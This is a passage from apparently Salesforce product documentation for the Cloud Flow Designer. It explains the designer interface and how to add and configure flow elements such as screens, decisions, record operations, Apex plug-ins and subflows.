warnings or errors upon saving. You can click the notification of warnings or errors to see all of them in a list. Warnings and
errors in the list are based on the state of the flow at your last save, not the present state of the flow.

Save and Save As
Depending on your needs, you can quick-save, save a new flow, or save a new flow version. To find out more about how
save works, see Saving a Flow on page 3224.

Run
Runs the most recent save of the flow you’re working in. If the flow contains subflow elements, each subflow runs the
active version of its referenced flow. If the referenced flow has no active version, then the subflow element runs the latest
version of its referenced flow.
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Run with Latest
Only appears if the open flow contains a subflow element. Runs the most recent save of the flow you’re working in, and
each subflow element runs the latest version of its referenced flow, even if that version is not active.

Close
Clicking Close from within an unsaved flow returns you to the flow list page. Clicking Close from within a saved flow
returns you to the flow detail page.

Undo ( ) and Redo ( )
Undo or redo recent actions on the main canvas.

Copy ( ) and Paste ( )
Copy and paste selected elements on the main canvas. Click to select a single element, or click and drag to select multiple

elements on the canvas. Once you’ve selected what you want to copy, click Copy ( ), and then click Paste ( ). You
can undo or redo a paste action, but not a copy.

Note:  When you copy and paste an element, the new copy has the unique name of the original, appended with
“_x”, where “x” is a number. The first copy of an element has “_0” appended to its unique name, and the number
increments from there with subsequent copies of the same element.

Flow Properties ( )
Shows you information about your flow, such as its name, unique name, description, version, and created and modified
dates. You can edit the name and description of your flow any time, but you can only change its unique name when
saving it for the first time.

Main Canvas (2)

To move an element, drag it around the canvas. If the element is connected to a line, the line moves with it. You can connect
items on the canvas by clicking the node beneath the source element and dragging and dropping a line anywhere onto a target
element. To select multiple elements, either drag a square around a group or use control-click to select individual elements.
Double-click any element in the main canvas to edit it.

Zoom Control (3)

Combined with the search options on the Explorer tab, the zoom control helps you manage large, complex flows.

Explorer Tab (4)

The Explorer tab is a library of all elements and resources added to the flow. Double-click items in the list to edit them.
Single-click an item to view its details and usage in the Description pane. Use the Explorer’s search options to quickly find
an element or resource in the flow. If you hover over a canvas-visible element on the Explorer, you can click its  to see its
location on the canvas.

Resources Tab (5)

The Resources tab lets you create new resources for your flow, like variables and constants. Once created, your new resources
show up in the Explorer tab.
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Palette Tab (6)

The Palette tab lists all the element types available for your flow. Drag and drop elements from the palette onto the main
canvas. Click an element in the palette to see its description or properties in the Description pane. Once created, your new
elements show up in the Explorer tab. If your palette contains many Apex classes and flows, use the Palette’s search field to
quickly find what you need to add an Apex plug-in or subflow element to your flow.

Description Pane (7)

When viewing an item in the Palette or Resources tab, the Description pane shows the item’s description or details. When
viewing items on the Explorer tab, the Description pane includes two subtabs:

• Properties—This subtab shows you information about the element or resource you have selected, such as its label, unique
name, description, and data type.

• Usage—This subtab lists the elements where the selected item is used. To see where one of the listed elements is located
on the canvas, hover over it and click its .

See Also:
Editing Flow Properties
Searching the Palette
Searching a Flow

Searching a Flow
As a flow grows and becomes more complex, it becomes more challenging to find things within it. The Cloud Flow Designer
offers tools for quickly finding flow elements and resources.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Open the flow in the Cloud Flow Designer. Then use one or more of the following options to find an element or resource in
the flow.

• On the Explorer tab, enter search text.
The Explorer tab displays only the elements and resources whose properties contain the entered text.

• Click  to filter the Explorer tab contents to one type of element or resource.

To remove the filter, click  and select SEARCH ALL.

• Select Highlight Results on Canvas to dim all visible elements on the canvas other than the Explorer search or filter
results.

• Zoom in and out as desired using the controls near the top right corner of the canvas area.

• To see the location of an Explorer item on the canvas, complete one of the following procedures.

If the Explorer item is a canvas-visible element or a screen field:
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1. Hover over the item on the Explorer tab.

2. Click its .

If the Explorer item is a resource that doesn’t appear on the canvas:

1. Click the item on the Explorer tab.
2. Click the Usage tab in the Description pane.
3. Hover over an element listed on the Usage tab.

4. Click its .

The canvas shifts to display the element and momentarily highlights it.

See Also:
Understanding the Flow Designer User Interface

Searching the Palette
As you add Apex classes that use the Process.Plugin interface and add more flows to your organization, it becomes more
challenging to find a specific Apex class or flow within the Palette. You can, however, search the Palette to quickly find what
you need to add an Apex plug-in or subflow element to your flow.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Open a flow in the Cloud Flow Designer. Then use the following options to find a Palette item.

• On the Palette tab, enter search text.
The Palette displays only the items that contain the entered text.

• Click  to filter the Palette tab contents to one type of element.
• To remove the filter, click  and select SEARCH ALL.

See Also:
Understanding the Flow Designer User Interface
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Managing Flow Designer Elements
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Adding, Editing, and Removing Elements

To add an element to the Designer main canvas, drag and drop it from the Palette in the left sidebar. To edit an element,
double-click it in the main canvas, or hover your mouse over it and click . To remove an element, hover your mouse over it
and click . Alternately, you can remove elements and connectors by selecting them and hitting the DELETE key.

Setting a Start Element

To set the starting element in your flow, hover your mouse over an element on the canvas and click . You can set any one
element on the canvas as the starting element. If you don't set a start element, you get a warning after saving your flow.

See Also:
Flow Designer Elements

Flow Designer Elements
Available in: Enterprise, Unlimited, and Developer Editions

Elements are the building blocks of flows. Each element represents an action, such as presenting information to, or collecting
information from, flow users, or even querying, creating, updating, and deleting information in Salesforce. By connecting
elements together in the Flow Designer, you can create a flow, which is a series of screens, inputs, and outputs through which
users navigate.

The following elements are available in the Cloud Flow Designer:

• Step

• Screen

• Decision

• Assignment

• Record Create

• Record Update

• Record Lookup

• Record Delete

• Subflows

3233

Managing Flow Designer ElementsEnhancing Your Business Processes



• Apex Plug-In

• Connector

Note: Every time you add an element or resource to a flow, it's also added to the Explorer tab.

See Also:
Flow Designer Resources
Flow Designer Overview

Adding and Configuring a Screen Element

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

The Screen element can be used to set up a form to capture user input, provide choice selections, and display information to
your users.

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Palette tab, drag the Screen element onto the canvas.
3. Set up your Screen by configuring fields on the General Info, Add a Field, and Field Settings tabs.
4. Click OK to accept your changes or Cancel to discard them.

Note: Every time you add an element or resource to a flow, it's also added to the Explorer tab.

As you progress through the Screen overlay, you can see a preview of what you're building in the right pane.

See Also:
Flow Designer Elements
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Configuring the Screen Element's General Info Tab

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

The Screen element overlay in the Flow Designer has three tabs: General Info, Add a Field, and Field Settings. To configure
the General Info tab:

1. Enter the general settings for the screen element.

DescriptionField

Helps you identify the element on the canvas.Name

Automatically populated if empty when you fill out the Name field and press TAB.

The requirement for uniqueness applies only to elements within the current flow. Two
elements can have the same unique name, provided they are used in different flows. A unique

Unique Name

name is limited to underscores and alphanumeric characters. It must begin with a letter, not
include spaces, not end with an underscore, and not contain two consecutive underscores.

Appears after you click Add Description.Description

At runtime, the system automatically determines which of the Next, Previous, and Finish
buttons are relevant for the screen, depending on whether there are any preceding or following

Navigation Options

screens in the flow path. You can use this field to restrict the screen from displaying either
the Previous or Finish button.

Options:

• No navigation restrictions—(Default) The system displays all relevant navigation buttons
on the screen.

• Don’t show Previous button—Select this option if revisiting the previous screen triggers
an action that musn't be repeated, such as a credit card transaction.

• Don’t show Finish button—Select this option if you need the user to go back to a
previous screen to continue or complete the flow.

For example, suppose the flow prompts the user to enter information to identify an
existing contact. The flow then looks up the user-entered info in the database. If no
matching contact is found, the flow displays a screen whose sole purpose is to tell the
user to go back and try again. That screen shouldn’t offer a Finish button to the user.

2. To provide flow users with help for the screen:

a. Click the arrow to expand the Help Text section.
b. Enter the text that you want flow users to see when they click Help for this form.

3235

Flow Designer ElementsEnhancing Your Business Processes



c. Optionally:

• Use the drop-down menu to add merge fields to your help text.
• Click  to switch between the plain text editor and the rich text editor. Using the rich text editor saves the content

as HTML.

See Also:
Flow Designer Elements

Using the Screen Element's Add A Field Tab

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

The Screen element overlay in the Flow Designer has three tabs: General Info, Add a Field, and Field Settings.

The Add a Field tab lists the available types of fields you can add to your Screen.

Add a field to the Screen by double-clicking the field type or dragging it to the preview pane. Remove a field from the Screen

by hovering over it and clicking . Reorder the fields in the preview pane by clicking and dragging them up and down.

See Also:
Flow Designer Elements

Configuring the Screen Element's Field Settings Tab

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

The Screen element overlay in the Flow Designer has three tabs: General Info, Add a Field, and Field Settings.

Use the Field Settings tab to configure the screen field you've selected in the preview pane. The options available on the Field
Settings tab vary based on the type of field.

• Inputs—textbox, long text area, number, currency, date, password, checkbox

• Choices—radio buttons, drop-down list, multi-select checkboxes, multi-select picklist
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• Outputs—display text

See Also:
Flow Designer Elements

Configuring User Input Fields on the Screen Element's Field Settings Tab

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

The Screen element overlay in the Flow Designer has three tabs: General Info, Add a Field, and Field Settings.

Use the Field Settings tab to configure the screen field you've selected in the preview pane. The options available on the Field
Settings tab vary based on the type of field. Here’s how to set up a user input screen field: textbox, long text area, number,
currency, date, password, or checkbox.

1. In the Screen overlay’s preview pane, click an input field to configure its settings.
2. In the General Info section, enter a Label to display text to the left of the field.
3. If you want to use the rich text editor to format your field label, click the rich text editor icon ( ) to the right of the Label

field.

a. Once you’re done editing the text, click OK. The Label field display changes to indicate that it is now a rich text field.

b. Click Edit to make changes to your label text.
c. Click Clear to completely clear the Label field and start over.

4. You can enter a different Unique Name for your field. By default, this field is filled in with your field label.

Note: A unique name is limited to underscores and alphanumeric characters. It must begin with a letter, not
include spaces, not end with an underscore, and not contain two consecutive underscores.

5. Enter a Default Value for the input field. You can select values from existing screen choice fields or flow resources, or
you can create a new resource with which to populate the field.

The data type of the default value must be compatible with that of the field. For example, a checkbox’s default value must
be of type boolean.

6. For number and currency fields, you can set a Scale value. The scale is the maximum number of digits allowed to the
right of the decimal point. This number can't exceed 17. If you leave this field blank or set to zero, only whole numbers
are displayed when your flow runs.

7. Select the Required checkbox to make the field required.
8. In the Input Validation section, create a formula expression to validate the user input for the field.
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a. Select Validate.
b. Enter a formula expression to define the values allowed for the field.
c. Customize the error message that will be displayed to the flow user if the input fails validation.

Click  to switch between the plain text editor and the rich text editor. Using the rich text editor saves the content as
HTML.

Note:

• If the formula statement evaluates to TRUE, the input is valid. If the formula statement evaluates to FALSE,
the error message is displayed to the user.

• If the user leaves the field blank, and the field is not required, no validation is performed.

9. To provide flow users with help for the field:

a. Click the arrow to expand the Help Text section.

b. Enter the text that you want flow users to see when they click  next to the field.
c. Optionally:

• Use the drop-down menu to add merge fields to your help text.
• Click  to switch between the plain text editor and the rich text editor. Using the rich text editor saves the content

as HTML.

10. Click OK.

See Also:
Configuring the Screen Element's Field Settings Tab
Adding and Configuring a Screen Element
Checkbox Input Fields Overview

Checkbox Input Fields Overview

Available in: Enterprise, Unlimited, and Developer Editions

A checkbox screen field is of type boolean. Use a checkbox screen field to offer flow users a yes or no choice. For example:

• Whether to opt into a marketing campaign.

• Whether to receive a follow-up call after a purchase or case resolution.

• Whether an important policy is understood.
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In this case, you can validate that the user selects the checkbox before proceeding to the next screen.

See Also:
Configuring User Input Fields on the Screen Element's Field Settings Tab
Global Constants Overview
Multi-Select Choice Fields Overview

Configuring Choice Fields on the Screen Element's Field Settings Tab

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

The Screen element overlay in the Flow Designer has three tabs: General Info, Add a Field, and Field Settings.

Use the Field Settings tab to configure the screen field you've selected in the preview pane. The options available on the Field
Settings tab vary based on the type of field. Here’s how to set up a choice screen field: radio buttons, drop-down list, multi-select
checkboxes, or multi-select picklist.

1. In the Screen overlay’s preview pane, click a choice type field to configure its settings.
2. In the General Info section, enter a Label to display text to the left of the field.
3. If you want to use the rich text editor to format your field label, click the rich text editor icon ( ) to the right of the Label

field.

a. Once you’re done editing the text, click OK. The Label field display changes to indicate that it is now a rich text field.

b. Click Edit to make changes to your label text.
c. Click Clear to completely clear the Label field and start over.

4. You can enter a different Unique Name for your field if necessary. By default, this field is filled in with your field label.

Note: A unique name is limited to underscores and alphanumeric characters. It must begin with a letter, not
include spaces, not end with an underscore, and not contain two consecutive underscores.

5. Optionally, change the Value DataType.

You can’t change the value data type of multi-select choice fields; only text is supported.

6. Select the Required checkbox to make the field required.
7. Use the Default Value field after you’ve created all your choice options in the Choice Settings section to set one to be

to pre-selected by default.
8. Use the Choice Settings section to configure the choice options.
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Note:  Add the choices in the order you want them to appear in the screen field. You can’t rearrange choices.

a. Click the arrow button on the Choice field to create a new choice option or select an existing one.
b. To create a new choice, select CREATE NEW > Choice. See Adding and Configuring a Choice on page 3263.
c. To create a new dynamic choice, select CREATE NEW > Dynamic Choice. Use a dynamic choice to create a lookup

to automatically populate the choice options during runtime. See Adding and Configuring a Dynamic Choice on page
3265.

d. Click Add Choice to add another choice option to the screen field.

9. To provide flow users with help for the field:

a. Click the arrow to expand the Help Text section.

b. Enter the text that you want flow users to see when they click  next to the field.
c. Optionally:

• Use the drop-down menu to add merge fields to your help text.
• Click  to switch between the plain text editor and the rich text editor. Using the rich text editor saves the content

as HTML.

10. Click OK.

See Also:
Configuring the Screen Element's Field Settings Tab
Multi-Select Choice Fields Overview
Adding and Configuring a Screen Element

Multi-Select Choice Fields Overview

Multi-select checkboxes and multi-select picklist fields enable flow users to select multiple choices in a screen field. At runtime,
each multi-select field stores its field value as a concatenation of the user-selected choice values, separated by semicolons.

Available in: Enterprise, Unlimited, and Developer Editions

When using multi-select choice fields, consider the following:

• At runtime, any semicolons in the selected choices’ stored values are removed when added to the multi-select field value.

• Similar to single-selection choice fields, such as radio buttons and drop-down lists, you can populate multi-select choice
fields with flow-specific choices and dynamic choices only. You can’t populate multi-select picklists in flows with the
picklist values of standard or multi-select picklist fields elsewhere in your organization.

• A multi-select choice field can have only one default value.

• A dynamic choice resource can be configured to assign field values from one user-selected record to variables in the flow.
When the dynamic choice is used in a multi-select choice field, flow variables store the field values of only the last selected
record in the dynamically generated set of choices. If the dynamic choice is used in multiple multi-select choice fields on
the same screen, the flow variable assignments are determined by the first multi-select choice field on the screen.
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• To ensure the correct runtime behavior of Decision elements that reference multi-select choice fields:

◊ Configure a stored value for each choice that you use in multi-select choice fields.

◊ Don’t use the same choice in multiple multi-select choice fields on the same screen.

See Also:
Configuring Choice Fields on the Screen Element's Field Settings Tab

Configuring Output Fields on the Screen Element's Field Settings Tab

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

The Screen element overlay in the Flow Designer has three tabs: General Info, Add a Field, and Field Settings.

Use the Field Settings tab to configure the screen field you've selected in the preview pane. The options available on the Field
Settings tab vary based on the type of field. Here’s how to set up a Display Text field on a Screen overlay.

1. In the Screen overlay’s preview pane, click the Display Text field to configure its settings.
2. Enter a Unique Name. A unique name is limited to underscores and alphanumeric characters. It must begin with a letter,

not include spaces, not end with an underscore, and not contain two consecutive underscores.
3. Enter the text you want to display to the flow user. For example, you could use a display text field to show flow users a

welcome message, a terms and conditions statement, or a description of a product or service.

Click  to switch between the plain text editor and the rich text editor. Using the rich text editor saves the content as
HTML.

4. Click OK.

See Also:
Configuring the Screen Element's Field Settings Tab
Adding and Configuring a Screen Element
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Adding and Configuring an Assignment Element

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Use the Assignment element to make changes to the value of a variable. For example, you could dynamically change the value
of a customer's credit score depending on how they answer certain questions in the flow.

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Palette, drag the Assignment element onto the canvas.
3. Enter a Name and Unique Name for the element.

Note: The requirement for uniqueness applies only to elements within the current flow. Two elements can have
the same unique name, provided they are used in different flows. A unique name is limited to underscores and
alphanumeric characters. It must begin with a letter, not include spaces, not end with an underscore, and not
contain two consecutive underscores.

4. If you haven’t already added a description, click Add Description to do so.
5. In the Assignments section, select the variable you want to change. If you haven’t created the variable yet, you can do that

by expanding the CREATE NEW section of the drop-down list.
6. Select an operator.
7. Enter a value or select an element to adjust the variable you selected. Use the CREATE NEW section of the drop-down

list to create new resources, if necessary.

Note:  When you add or subtract a number from a date value, the date adjusts in days, not hours.

8. Click Add Assignment to add another line. Click and drag assignment line items to reorder them.

9. Click  to remove a line.
10. Click OK to accept your changes or Cancel to discard them.

Note: Every time you add an element or resource to a flow, it's also added to the Explorer tab.

See Also:
Flow Designer Elements
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Adding and Configuring a Decision Element

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Use the Decision element to evaluate a set of conditions and route users through the flow based on the outcomes of those
conditions.

You can use a Decision element to drive your flow without explicit end-user input. For example:

• In a customer self-help portal, a Decision element could determine whether a customer is given a return shipping address
and information (because an item is definitely faulty), or given information on how to resolve their problem themselves.

• Within a banking flow, a Decision element could determine if a customer should be offered a loan or not (based on results
of a credit scoring formula).

Tip:  If you ask a user to make a choice, for example with a drop-down list choice field on a screen, you can add a
Decision element after the Screen element to create the branches of the flow based on the choice options. Represent
each choice option in your Decision element and connect it to a branch of your flow.

To add or configure a Decision element:

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Palette, drag the Decision element onto the canvas.
3. Enter a Name and Unique Name for the Decision.

The requirement for uniqueness applies only to elements within the current flow. Two elements can have the same unique
name, provided they are used in different flows. A unique name is limited to underscores and alphanumeric characters. It
must begin with a letter, not include spaces, not end with an underscore, and not contain two consecutive underscores.

4. If you haven’t already added a description, click Add Description to do so.
5. Create the outcomes for the decision:

a. Enter a Name and Unique Name for the first outcome.
b. Set up the conditions for the outcome. You can expand the CREATE NEW section of the Resource or Value

drop-down list to create new resources, if necessary.

Note:  Two operators are unique to the Cloud Flow Designer. Depending on the type of Resource you
select, you might see these in the Operator list:

• was selected—Available only for choices. Lets you track whether a specific choice on a screen was selected
by the user. To learn more about how was selected works, see Visual Workflow Considerations on page
3270.

• was visited—Available for any main canvas element. Lets you track whether an element in the flow was
visited by the user.

Selecting either of these operators makes the Value of the condition statement Boolean. You can then set
the Value to true or false by clicking the arrow button, expanding the GLOBAL CONSTANT section, and
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selecting either $GlobalConstant.True or $GlobalConstant.False. For more information, see Global
Constants Overview on page 3267.

c. Click Add Condition to add another condition or click  to remove a condition. At runtime, the conditions are
evaluated in the order you specify.

d. Choose under which conditions the outcome evaluates to true:

• All conditions must be true (AND)—The outcome will evaluate to true overall if all the conditions you specified
evaluate to true.

• One condition must be true (OR)—The outcome will evaluate to true overall if at least one of the conditions
you specified evaluates to true.

6. Click Add Outcome to add more outcomes. You can drag outcomes up and down to reorder them.
7. Click [Default Outcome] to set up a path to which users will be routed if none of the other outcome conditions are met.
8. Click OK to accept your changes or Cancel to discard them.

When you’re done setting up your outcomes, you can then draw connectors from your Decision element to other elements on
the canvas and assign an outcome to each connector.

See Also:
Flow Designer Elements

Adding and Configuring a Record Create Element

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Use the Record Create element to create a new record in Salesforce using values from your flow. For example, you could
capture the name and address that a user enters into the flow, use the Record Lookup element to see if they exist in Salesforce,
and if they don't, use the Record Create element to create a new record for that user.

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Palette, drag the Record Create element onto the canvas.
3. Enter a Name and Unique Name for the element.

Note: The requirement for uniqueness applies only to elements within the current flow. Two elements can have
the same unique name, provided they are used in different flows. A unique name is limited to underscores and
alphanumeric characters. It must begin with a letter, not include spaces, not end with an underscore, and not
contain two consecutive underscores.

4. If you haven’t already added a description, click Add Description to do so.
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5. Select the object for which you want to create a record.
6. Select the field or fields from the object that you want to populate, then assign a value or resource to the field. The data

types must match.

In the Value column, you can manually enter literal or merge field values. You can also select pre-defined flow values
(from variables, constants or user inputs, for example). Use the CREATE NEW section of the drop-down list to create
new resources, if necessary. When entering a date value, you must use the MM/DD/YYYY format.

7. Click Add Row to set the value of another field.

8. Click  to remove a line.
9. Optionally, assign the new record's ID to a variable so you can use it or refer to it later in the flow. The variable you choose

must be of type text. If you haven’t created the variable yet, you can do that by expanding the CREATE NEW section
of the drop-down list.

10. Click OK to accept your changes or Cancel to discard them.

Important:  Check your object definition to ensure that all required fields are populated with values; otherwise the
record create will fail at runtime. If the record create does fail, the fault connector path will be taken if you’ve defined
one.

See Also:
Flow Designer Elements
Fault Connector Overview

Adding and Configuring a Record Lookup Element

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Use a Record Lookup element to find a Salesforce record and store the values from its fields into your flow. For example, you
could use a Record Lookup element to:

• Input (or read) a bar code from a product tag and use the code to read data from the database to find out the product name
or description.

• Look up item details to check for stock availability.

• Look up a customer record to verify a caller's identity.

To add and configure a Record Lookup element:

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Palette, drag the Record Lookup element onto the canvas.
3. Enter the general settings for the element.
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DescriptionField

Helps you identify the element on the canvas.Name

The requirement for uniqueness applies only to elements within the current flow. Two
elements can have the same unique name, provided they are used in different flows. A unique

Unique Name

name is limited to underscores and alphanumeric characters. It must begin with a letter, not
include spaces, not end with an underscore, and not contain two consecutive underscores.

Appears after you click Add Description.Description

4. Select the object to identify which record type to look up.
5. Specify the filter criteria for selecting the record from the database.

Click Add Row to enter more filters. Click  to remove a row.

DescriptionColumn Header

Field for filtering records.Field

The available filter operators depend on the data type selected for the Field and Value.Operator

The Field and Value in the same row must have the same data type.

Options:

Value

• Select an existing flow resource, such as a variable, constant, or user input.
• Select CREATE NEW to create a new flow resource.
• Manually enter a literal value or merge field.

If you manually enter a date, you must use the MM/DD/YYYY format.

Make sure your filter criteria sufficiently narrows the search. The Record Lookup element ultimately returns only the first
record from the filtered results, which aren’t retrieved from the database in any particular order.

6. To sort the filtered results before the first record is selected:

a. Select Sort results by.
b. Select the field to sort by. Only sortable fields appear in the drop-down list.
c. Select the sort order, either ascending or descending.

7. Assign the values of fields in the returned record to variables in the flow.

Click Add Row to enter more field assignments. Click  to remove a row.

DescriptionColumn Header

Record’s field whose value you want to assign to a variable.Field

Select an existing flow variable, or select CREATE NEW to create a new variable.Variable

8. Click OK.
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Note:  If the record lookup fails for some reason, the fault connector path will be taken if you’ve defined one.

See Also:
Flow Designer Elements
Fault Connector Overview

Adding and Configuring a Record Update Element

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Use a Record Update element to update a set of records in Salesforce with variable, constant, input, or other values from your
flow. You can update a single record, or multiple records, depending on how you set your filter criteria.

If you're using flows in a call center, for example, you can use a Record Update element to automatically update Salesforce
with data collected from callers, such as new addresses, phone numbers, or product preferences.

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Palette, drag the Record Update element onto the canvas.
3. Enter a Name and Unique Name for the element.

Note: The requirement for uniqueness applies only to elements within the current flow. Two elements can have
the same unique name, provided they are used in different flows. A unique name is limited to underscores and
alphanumeric characters. It must begin with a letter, not include spaces, not end with an underscore, and not
contain two consecutive underscores.

4. If you haven’t already added a description, click Add Description to do so.
5. Select the object for which you want to update a record.
6. Set criteria to select which records get updated. The data types of the values in the Field and Value columns must match.

In the Value column, you can manually enter literal or merge field values. You can also select pre-defined flow values
(from variables, constants or user inputs, for example). Use the CREATE NEW section of the drop-down list to create
new resources, if necessary. When entering a date value, you must use the MM/DD/YYYY format.

Important:  You must configure at least one filter, or you will update all the records for the object.

7. Click Add Row to add another filter.

8. Click  to remove a line.
9. Update record fields with values from your flow:
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a. Select a field on the record that you want to update.
b. Select a value from your flow (like a variable, constant or user input, for example) that you want to assign to the record's

field. Use the CREATE NEW section of the drop-down list to create new resources, if necessary.
c. Click Add Row to update another field.

d. Click  to remove a field.

10. Click OK to accept your changes or Cancel to discard them.

Note:  If the record update fails for some reason, the fault connector path will be taken if you’ve defined one.

See Also:
Flow Designer Elements
Fault Connector Overview

Adding and Configuring a Record Delete Element

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Use a Record Delete element to delete records in Salesforce. You can delete a single record or multiple records, depending on
how you set your filter criteria.

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Palette, drag the Record Delete element onto the canvas.
3. Enter a Name and Unique Name for the element.

Note: The requirement for uniqueness applies only to elements within the current flow. Two elements can have
the same unique name, provided they are used in different flows. A unique name is limited to underscores and
alphanumeric characters. It must begin with a letter, not include spaces, not end with an underscore, and not
contain two consecutive underscores.

4. If you haven’t already added a description, click Add Description to do so.
5. Select the object whose records you want to delete.
6. Add rows of filter criteria to determine which records will be deleted. You must configure at least one filter.

In the Value column, you can manually enter literal or merge field values. You can also select pre-defined flow values
(from variables, constants or user inputs, for example). Use the CREATE NEW section of the drop-down list to create
new resources, if necessary. When entering a date value, you must use the MM/DD/YYYY format.

7. Click Add Row to add another filter.
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8. Click  to remove a line.
9. Click OK to accept your changes or Cancel to discard them.

Warning:  Things to note when using a Record Delete element:

• Be careful when testing flows that contain Record Delete elements. Even if the flow is inactive, running it will
trigger the delete operation.

• To prevent deleting records by mistake, be as specific in your filter criteria as possible.

• Records are deleted from your organization the moment the flow executes the Record Delete element.

• Deleted records are sent to the Recycle Bin and remain there for 15 days before they are permanently deleted.

Note:  If the record delete fails for some reason, the fault connector path will be taken if you’ve defined one.

See Also:
Flow Designer Elements
Fault Connector Overview

Flow Apex Plug-ins Overview

Available in: Enterprise, Unlimited, and Developer Editions

The Apex Plug-in element represents a piece of Apex code that you can use to pass data between your organization and a
flow.

When using Apex plug-ins in a flow:

• Add a tag string to your Apex plug-in to group your plug-ins in the Flow Designer Palette. If you don't add a tag string
to a plug-in, it shows up at the root level of the Apex Plug-ins section.

• Apex primitive data types Blob and Time aren't supported for flow plug-ins.

• If you don't provide a name for your plug-in, it displays in the Palette using the class name.

• If you make code changes to an Apex plug-in while the Cloud Flow Designer is open, you won't see the changes in the
plug-in elements until you close and re-open the Designer.

See Also:
Adding and Configuring an Apex Plug-in Element
Flow Designer Elements
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Adding and Configuring an Apex Plug-in Element

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

The Apex Plug-in element represents a piece of Apex code that you can include in a flow. It lets you call an Apex class with
the Process.Plugin interface and pass data between your organization and a flow.

When you open it, the Cloud Flow Designer discovers any Process.Plugin classes you created and displays them as elements
on the Palette. Select a plug-in on the Palette to view its tag, class name, inputs, and outputs in the Description pane. Required
inputs are listed with an asterisk (*).

Important:  Before you can use an Apex Plug-in element in a flow, you must first write the Apex class that implements
the Process.Plugin interface. Be sure your describe method is implemented correctly so the Flow Designer can
pull the input and output information.

To add or configure an Apex Plug-in element:

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Palette, drag an Apex Plug-in element onto the canvas. The class name and plug-in description are taken from

the plug-in code.
3. Enter a name for your new plug-in element.
4. If necessary, enter a different unique name.

Note: The requirement for uniqueness applies only to elements within the current flow. Two elements can have
the same unique name, provided they are used in different flows. A unique name is limited to underscores and
alphanumeric characters. It must begin with a letter, not include spaces, not end with an underscore, and not
contain two consecutive underscores.

5. If you haven’t already added a description, click Add Description to do so.
6. On the Inputs tab, assign values to the Apex parameters.

Required parameters are automatically listed as targets. Click Add Row to set an optional parameter. Click  to remove
a row.

DescriptionColumn Header

Apex parameter whose value you want to set.Target

Value to assign to the Apex parameter.

Options:

Source

• Select an existing flow resource, such as a variable, constant, or user input.
• Select CREATE NEW to create a new flow resource.
• Manually enter a literal value or merge field.
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DescriptionColumn Header

If you manually enter a date, you must use the MM/DD/YYYY format.

7. On the Outputs tab, assign values from Apex parameters to variables in the flow.

Click Add Row to enter more output assignments. Click  to remove a row.

DescriptionColumn Header

Apex parameter whose value you want to get.Source

Select an existing flow variable, or select CREATE NEW to create a new variable.Target

8. Click OK.

Note:  If the Apex plug-in fails for some reason, the fault connector path will be taken if you’ve defined one.

See Also:
Flow Apex Plug-ins Overview
Fault Connector Overview

Subflows Overview
Reduce the complexity of your flow by reusing other flows.

Available in: Enterprise, Unlimited, and Developer Editions

A subflow element references another flow and calls that flow at runtime. When a flow contains a subflow element, we call it
the master flow to distinguish it from the referenced flow.

With subflows, you can simplify your overall flow architecture. Build reusable flows to perform common tasks. For example,
you can build reusable flows to capture address and credit card information, and authorize a credit card purchase amount.
Then you can have multiple product-ordering flows call the reusable flows as needed.

At runtime, the master flow calls the active version of each referenced flow by default. If a referenced flow has no active version,
then the master flow calls the latest version of the referenced flow. To run only the latest version of each referenced flow, use
one of the following methods:

• Open the master flow in the Cloud Flow Designer, and click Run with Latest in the button bar.

• Run the master flow from the flow URL appended with ?latestSub=true.
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Note:  Only flow administrators can run inactive flows. For other users, the flow will fail at runtime if a subflow
element tries to call a flow with no active version.

The Palette lists the other flows in your organization. If you select a flow in the Palette, the following information appears in
the Description pane:

• The flow’s unique name and description.

• The version of the flow that would be called by default at runtime.

• The flow version’s variables that are available for input or output assignments.

